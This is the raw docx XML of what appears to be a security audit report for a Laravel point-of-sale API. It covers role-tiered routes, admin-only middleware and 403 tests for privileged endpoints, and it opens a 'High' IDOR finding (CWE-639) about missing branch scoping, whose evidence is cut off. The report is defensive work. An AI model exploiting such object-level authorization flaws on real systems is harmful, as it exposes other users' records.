                <v:shape id="Shape 639" style="position:absolute;width:15144;height:1428;left:0;top:0;" coordsize="1514475,142875" path="m9525,0l1504950,0c1507581,0,1509825,927,1511685,2787c1513545,4645,1514475,6890,1514475,9525l1514475,133350c1514475,135979,1513545,138224,1511685,140081c1509825,141942,1507581,142872,1504950,142875l9525,142875c6895,142872,4650,141942,2789,140081c930,138224,0,135979,0,133350l0,9525c0,6890,930,4645,2789,2787c4650,927,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routes/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> restructured into three explicit tiers public, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auth:sanctum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">active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 admin</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with each placement decided by what the job </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>actually requires</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and commented accordingly. Cashiers keep creating invoices, creating and finding customers, and taking credit payments. Cancelling an invoice, adjusting a credit balance, repricing and all cost/margin reporting became </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">only. The inline checks in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DiscountRequestController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are now backed by route middleware so a future handler cannot forget.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5401789B" w14:textId="5E48DC4E" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="84"/>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Eleven privileged endpoints, each asserted to return 403 for an employee </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to remain reachable for an </w:t>
      </w:r>
      <w:r w:rsidR="00E868FD" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>administrator a</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gate that refuses everybody is not a fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A0F88D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00E868FD">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C643D66" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00E868FD">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2266A863" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00E868FD">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D65705" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00E868FD">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB9E094" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00E868FD">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7816240A" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00E868FD">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127BC949" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRDefault="00E868FD" w:rsidP="00E868FD">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43AD14DB" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRPr="005C54CB" w:rsidRDefault="00E868FD" w:rsidP="00E868FD">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E74672" w14:textId="297BBC5B" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>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V-03 · IDOR no branch scoping on any record lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4871CC8A" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="518677DA" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="239"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0910AAAE" wp14:editId="5F709460">
                <wp:extent cx="6480126" cy="2591476"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="25897" name="Group 25897"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="2591476"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="2591476"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="836" name="Shape 836"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="505504"/>
                            <a:ext cx="6480126" cy="723900"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="723900">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1445"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5028"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="718865"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="722443"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="723410"/>
                                  <a:pt x="6470001" y="723894"/>
                                  <a:pt x="6467474" y="723900"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="723900"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="723894"/>
                                  <a:pt x="14094" y="723410"/>
                                  <a:pt x="11760" y="722443"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="721475"/>
                                  <a:pt x="7366" y="720099"/>
                                  <a:pt x="5580" y="718319"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="716527"/>
                                  <a:pt x="2417" y="714468"/>
                                  <a:pt x="1450" y="712133"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="704850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11751"/>
                                </a:ln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837" name="Shape 837"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="2048554"/>
                            <a:ext cx="6480126" cy="542922"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="542922">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="477"/>
                                  <a:pt x="6474764" y="1442"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5028"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="537888"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="541471"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="542438"/>
                                  <a:pt x="6470001" y="542922"/>
                                  <a:pt x="6467474" y="542922"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="542922"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="542922"/>
                                  <a:pt x="14094" y="542438"/>
                                  <a:pt x="11760" y="541471"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="540503"/>
                                  <a:pt x="7366" y="539127"/>
                                  <a:pt x="5580" y="537341"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="535555"/>
                                  <a:pt x="2417" y="533490"/>
                                  <a:pt x="1450" y="531158"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="523872"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11751"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9416"/>
                                  <a:pt x="3793" y="7358"/>
                                  <a:pt x="5580" y="5575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7366" y="3786"/>
                                  <a:pt x="9426" y="2409"/>
                                  <a:pt x="11760" y="1442"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14094" y="477"/>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852" name="Rectangle 852"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="587607" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="772A4550" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00CA733A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>OWASP</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="853" name="Rectangle 853"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="441871" y="0"/>
                            <a:ext cx="2167611" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2BB20BCC" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> A01:2021 / API1:2023 BOLA · </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="854" name="Rectangle 854"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2071687" y="0"/>
                            <a:ext cx="684181" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="687B53B8" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00CA733A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>CWE-639</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="855" name="Rectangle 855"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2586186" y="0"/>
                            <a:ext cx="140274" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5E47A60A" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> · </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="856" name="Rectangle 856"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2691705" y="0"/>
                            <a:ext cx="350683" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7DB9B28F" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00CA733A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>High</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="857" name="Rectangle 857"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="266700"/>
                            <a:ext cx="736976" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="58040B7D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t>Evidence.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="858" name="Rectangle 858"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="554236" y="266700"/>
                            <a:ext cx="491189" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2E3997D9" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> Every </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="859" name="Shape 859"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="923925" y="248329"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4645"/>
                                  <a:pt x="285750" y="6893"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126451"/>
                                  <a:pt x="284820" y="128699"/>
                                  <a:pt x="282960" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132420"/>
                                  <a:pt x="278855" y="133350"/>
                                  <a:pt x="276225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126451"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4645"/>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5471" name="Rectangle 25471"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="950565" y="271987"/>
                            <a:ext cx="77521" cy="140102"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="728326B6" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>{</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25473" name="Rectangle 25473"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1008852" y="271987"/>
                            <a:ext cx="155042" cy="140102"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2C710DE1" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
